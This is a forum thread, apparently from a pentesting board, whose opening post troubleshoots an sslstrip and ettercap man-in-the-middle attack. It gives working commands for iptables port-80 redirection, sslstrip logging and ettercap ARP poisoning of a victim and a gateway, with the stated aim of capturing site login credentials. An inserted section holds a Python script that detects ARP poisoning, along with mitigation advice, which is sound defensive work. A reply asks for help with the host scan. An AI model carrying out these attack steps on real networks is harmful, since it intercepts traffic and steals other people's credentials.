Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)
I've been scratching my head the last few days and finally found the answer to why I wasn't getting credentials from logins at sites.
There are A LOT of videos and how-to write-ups for ettercap and sslstrip, and everyone seems to say something different. I have to give credit to Maverick35 for leading me in this direction to find the answer.
Other sites I've been to say to do the following (ex.):
#Open Terminal
#Redirects requests on port 80 to sslstrip running on port 10000
Quote:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Quote:
echo "1" > /proc/sys/net/ipv4/ip_forward
#You can check the forwarding if you want by typing:
Quote:
cat /proc/sys/net/ipv4/ip_forward
#You should see a "1" there
#New Terminal
#Run sslstrip logging on port 10000
#I use -p to log only SSL POSTs. -f substitutes a lock favicon on secure requests
#(Optional) You can monitor the log
Quote:
tail -F sslstrip.log
#Launch ettercap gui with packet dump
Quote:
ettercap -G -w ~/ettercap_packets.pcap
#In Ettercap enter unified sniffing
Quote:
Sniff->Unified Sniffing
#Select your interface
#Scan for hosts
Quote:
Hosts->Scan for hosts
#View hosts list for scan
#Select Targets
Quote:
Highlight the victim -> Add to Target 1
Highlight the victim -> Add to Target 2
#View the added targets
Quote:
Targets -> Current Targets
#Perform Arp poisoning (Mitm attack) on targets
Quote:
Mitm -> Arp Poisoning (Sniff remote connections)
#Start
Quote:
Start -> Start Sniffing
This was giving me no love here. If you man ettercap you will see that ettercap already does the forwarding for you (/proc/sys/net/ipv4/ip_forward), so there is no need to do it. In fact, if you run ettercap after you type in that command, it will just set /proc/sys/net/ipv4/ip_forward back to "0" afterwards. Try cat /proc/sys/net/ipv4/ip_forward after running ettercap and you will see it has set the kernel back to "0". It is described in the man page.
The real issue I was having was with sslstrip. I didn't know it until a little while ago. I wasn't getting credentials on all sites like I was hoping. Come to find out, sslstrip (I'm using the .9 version) only works with python 2.5 and up. If you look at the sslstrip.py file with gedit /pentest/web/sslstrip/sslstrip.py you will see at the top:
Quote:
#!/usr/bin/env python
#You need to change it to:
Quote:
#!/usr/bin/python2.6
The quickest way for me to set up everything and have it working is without the GUI; just type the lines below:
iptables -t nat --flush (To flush any added rules to the nat tables)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f (only logging https and uses the Favicon)
OPEN another terminal:
ettercap -Tqi "your interface" -M arp:remote /Victim/ /Gateway/ -P autoadd (you can also just do // /Gateway/ , if you want to get all targets)
That's it. After that everything was working smoothly.
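What the ettercap arp:remote step above looks like from the other side of the wire, as an added example that is not part of the thread: during ARP poisoning one attacker MAC answers ARP requests for both the victim and the gateway, so a capture of ARP replies shows the gateway IP flipping between two MACs and one MAC claiming several IPs. The script below parses constructed tcpdump-style ARP reply lines (the addresses and timestamps are made up for this example) and flags those symptoms; the known gateway MAC passed to analyze() is assumed to come from an inventory or a capture taken before the poisoning started.

```python
"""Detect ARP-poisoning symptoms in a capture of ARP replies.

Input is constructed here to resemble the lines tcpdump prints for ARP
replies, e.g.:
  12:00:01.000100 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
None of the addresses below are real; they are sample values for the demo.
"""
import re
from collections import defaultdict

# Matches "ARP, Reply <ip> is-at <mac>" anywhere in a tcpdump line.
ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

# Constructed capture: 192.168.1.1 is the gateway, 192.168.1.20 the victim,
# and 00:de:ad:be:ef:01 the machine doing the poisoning.
SAMPLE_CAPTURE = """\
12:00:01.000100 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:01.000200 ARP, Reply 192.168.1.20 is-at 00:aa:bb:cc:dd:ee, length 28
12:00:03.000300 ARP, Reply 192.168.1.1 is-at 00:de:ad:be:ef:01, length 28
12:00:03.000400 ARP, Reply 192.168.1.20 is-at 00:de:ad:be:ef:01, length 28
12:00:05.000500 ARP, Reply 192.168.1.1 is-at 00:de:ad:be:ef:01, length 28
"""


def parse_arp_replies(capture):
    """Return a list of (ip, mac) pairs, one per ARP reply line, in capture order."""
    replies = []
    for line in capture.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            replies.append((m.group("ip"), m.group("mac").lower()))
    return replies


def find_ip_mac_flaps(replies):
    """Map each IP that was answered by more than one MAC to the MACs seen, in order."""
    seen = defaultdict(list)
    for ip, mac in replies:
        if mac not in seen[ip]:
            seen[ip].append(mac)
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}


def find_mac_claiming_many_ips(replies, threshold=2):
    """Map each MAC that claimed at least `threshold` distinct IPs to those IPs."""
    claims = defaultdict(set)
    for ip, mac in replies:
        claims[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in claims.items() if len(ips) >= threshold}


def check_gateway(replies, gateway_ip, known_gateway_mac):
    """Return every MAC other than the known one that answered for the gateway IP."""
    known = known_gateway_mac.lower()
    return sorted({mac for ip, mac in replies if ip == gateway_ip and mac != known})


def analyze(capture, gateway_ip, known_gateway_mac):
    """Run all three checks over a capture and return the findings as a dict."""
    replies = parse_arp_replies(capture)
    return {
        "flapping_ips": find_ip_mac_flaps(replies),
        "multi_ip_macs": find_mac_claiming_many_ips(replies),
        "rogue_gateway_macs": check_gateway(replies, gateway_ip, known_gateway_mac),
    }


if __name__ == "__main__":
    findings = analyze(SAMPLE_CAPTURE, "192.168.1.1", "00:11:22:33:44:55")
    for name, result in findings.items():
        print(f"{name}: {result}")
```

On a real segment the same logic runs over the output of tcpdump -n arp or a periodic arp -n snapshot; the gateway check is the cheapest alert to wire into a monitoring script because the gateway MAC should never change between polls. Static ARP entries for the gateway on sensitive hosts, and dynamic ARP inspection on managed switches, are the usual mitigations for what these checks detect.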
Re: Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)
Hello Altoid. Can you help me figure out a problem with ettercap usage? I don't get the attacker (BackTrack OS) in the list when I scan for hosts. It gives me the host OS (WIN 07) and my gateway (internet router) in the hosts list. I am using BackTrack in VMware with the network adapter in bridged mode.